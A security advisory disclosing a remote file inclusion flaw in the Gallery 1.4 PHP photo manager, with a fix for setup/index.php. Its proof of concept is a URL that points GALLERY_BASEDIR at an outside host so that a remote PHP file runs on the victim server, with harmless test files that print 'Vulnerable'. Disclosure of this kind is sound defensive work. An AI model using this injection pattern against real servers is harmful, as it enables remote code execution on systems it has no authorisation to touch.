Gallery 1.4 including file vulnerability

[Peter "Stöckli" <pcs () rootquest com>]

Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. With 
Gallery you can easily create and maintain albums of photos via an intuitive interface. Photo management includes 
automatic thumbnail creation, image resizing, rotation, ordering, captioning, searching, and more. Albums can have 
read, write, and caption permissions per individual authenticated user for an additional level of privacy. Gallery is 
installed on maybe 20000 Locations.

-Proof of concept-
It is possible to include any php file from a remote host, and execute it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php"; exists, it will be included. This file could look like this if PHP isn't supported 
on the "tester"-host:

<?php echo "Vulnerable"; ?>

or like this, if PHP is supported on the "tester"-host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following Lines in the index.php files in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
        $GALLERY_BASEDIR = '../';
}

to this:

        $GALLERY_BASEDIR = '../';

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

Peter Stöckli
RQ Labs
Rootquest
Switzerland